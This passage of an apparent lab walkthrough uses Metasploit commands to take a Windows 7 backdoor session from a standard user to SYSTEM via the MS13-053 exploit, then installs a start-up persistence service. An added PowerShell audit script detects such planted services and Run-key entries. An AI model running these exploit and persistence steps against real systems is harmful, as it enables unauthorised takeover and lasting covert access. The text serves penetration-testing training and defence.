When you have completed steps 1 to 3, you have a backdoor connection to a Windows 7 machine under a standard user account. Now it's time to see whether we can get admin rights by using an exploit.
Run these commands from the meterpreter console:
use post/multi/recon/local_exploit_suggester
show options
set session 1
run
This script checks which local privilege escalation methods are likely to succeed on the Windows 7 machine, which is very handy when you need to act quickly.
Let's try this one:
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-053
use exploit/windows/local/ms13_053_schlamperei
set session 1
exploit
You'll see that a new session is created (verify this with sessions -l).
Connect to the new backdoor session with sessions -i <newID> and, once connected, type
getuid
If everything is correct you will see that you are SYSTEM on the Windows 7 machine. Of course you want to keep this access permanently, which you can do with the command
run persistence
This installs a service that connects back when the system starts.
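As an added example, not part of the original walkthrough, here is the defender-side check for this last step: a PowerShell script that lists auto-start services and Run-key entries on the Windows 7 box whose binary lives outside the standard system directories, which is where a newly planted start-up service tends to show up. The registry keys, the "trusted root" heuristic and the path-parsing rules are assumptions of this example.

```powershell
# Added example (not from the original walkthrough): audit auto-start services
# and Run keys for entries whose executable is outside the usual system folders.
# Targets PowerShell 2.0 (Windows 7 default); run from an administrator shell.

# Assumed "trusted" roots; anything outside these gets flagged for review.
$trustedRoots = @($env:SystemRoot, ${env:ProgramFiles}, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.ToLower() }

function Test-TrustedPath {
    param([string]$Path)
    if (-not $Path) { return $false }
    # Keep only the executable: quoted paths may contain spaces, unquoted ones
    # end at the first space (an unquoted path with spaces is itself suspicious).
    if ($Path.StartsWith('"')) { $exe = $Path.Split('"')[1] }
    else                       { $exe = $Path.Split(' ')[0] }
    if (-not $exe) { return $false }
    $exe = $exe.ToLower()
    foreach ($root in $trustedRoots) {
        if ($exe.StartsWith($root)) { return $true }
    }
    return $false
}

Write-Host "== Auto-start services with binaries outside system directories =="
Get-WmiObject Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and -not (Test-TrustedPath $_.PathName) } |
    Select-Object Name, StartName, PathName |
    Format-Table -AutoSize

Write-Host "== Run key entries (HKLM and HKCU) =="
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    # Each registry value becomes a property; skip the PowerShell metadata ones.
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |
        ForEach-Object {
            $flag = ''
            if (-not (Test-TrustedPath $_.Value)) { $flag = '   <-- outside system dirs' }
            Write-Host ("{0}\{1} = {2}{3}" -f $key, $_.Name, $_.Value, $flag)
        }
}
```

Compare the flagged entries against a baseline taken before the exercise; a service or Run value that appeared after the SYSTEM session was obtained is the persistence mechanism to remove when cleaning up the lab machine.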